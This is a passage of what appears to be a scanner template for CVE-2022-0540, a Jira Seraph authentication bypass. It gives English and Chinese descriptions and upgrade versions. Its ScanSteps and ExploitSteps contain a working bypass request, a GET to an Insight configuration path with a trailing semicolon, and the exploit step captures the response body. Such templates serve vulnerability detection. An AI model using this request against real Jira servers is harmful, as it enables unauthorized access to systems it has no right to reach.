A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request.
Upgrade the version
Jira:
- 8.13.x >= 8.13.18
- 8.20.x >= 8.20.6
- all versions >= 8.22.0
Jira Service Management:
- 4.13.x >= 4.13.18
- 4.20.x >= 4.20.6
- all versions >= 4.22.0
", "References": [ "https://github.com/ARPSyndicate/kenzer-templates/blob/5dc272615d6109789f358034b29da50af50b65cd/nuclei/cvescan/critical/CVE-2022-0540.yaml" ], "Is0day": false, "HasExp": true, "ExpParams": [], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/InsightPluginShowGeneralConfiguration.jspa;", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "group", "operation": "OR", "checks": [ { "type": "item", "variable": "$body", "operation": "contains", "value": "常规 Insight 配置", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "General Insight Configuration", "bz": "" } ] } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/InsightPluginShowGeneralConfiguration.jspa;", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "group", "operation": "OR", "checks": [ { "type": "item", "variable": "$body", "operation": "contains", "value": "常规 Insight 配置", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "General Insight Configuration", "bz": "" } ] } ] }, "SetVariable": [ "output|lastbody||" ] } ], "Tags": [ "Unauthorized Access" ], "VulType": [ "Unauthorized Access" ], "CVEIDs": [ "CVE-2022-0540" ], "CNNVD": [ "CNNVD-202204-3908" ], "CNVD": [ "" ], "CVSSScore": "9.9", "Translation": { "CN": { "Name": "Jira身份验证绕过漏洞 (CVE-2022-0540)", "Product": "ATLASSIAN-JIRA", "Description": "Jira 和 Jira Service Management 容易受到其 Web 身份验证框架 Jira Seraph 中的身份验证绕过的攻击。未经身份验证的远程攻击者可以通过发送特制的 HTTP 请求来利用此漏洞,以使用受影响的配置绕过 WebWork 操作中的身份验证和授权要求。 这会影响 8.13.18 之前的 Atlassian Jira Server 和 Data Center 版本、8.20.6 之前的 8.14.0 及更高版本以及 8.22.0 之前的 8.21.0 及更高版本。
升级版本
Jira:
- 8.13.x >= 8.13.18
- 8.20.x >= 8.20.6
- Jira所有版本 >= 8.22.0
Jira Service Management:
- 4.13.x >= 4.13.18
- 4.20.x >= 4.20.6
- Jira Service Management所有版本 >= 4.22.0
", "Impact": "未经身份验证的远程攻击者可以通过发送特制的 HTTP 请求来利用此漏洞,以使用受影响的配置绕过 WebWork 操作中的身份验证和授权要求。
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
Upgrade the version
Jira:
- 8.13.x >= 8.13.18
- 8.20.x >= 8.20.6
- all versions >= 8.22.0
Jira Service Management:
- 4.13.x >= 4.13.18
- 4.20.x >= 4.20.6
- all versions >= 4.22.0
", "Impact": "A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request.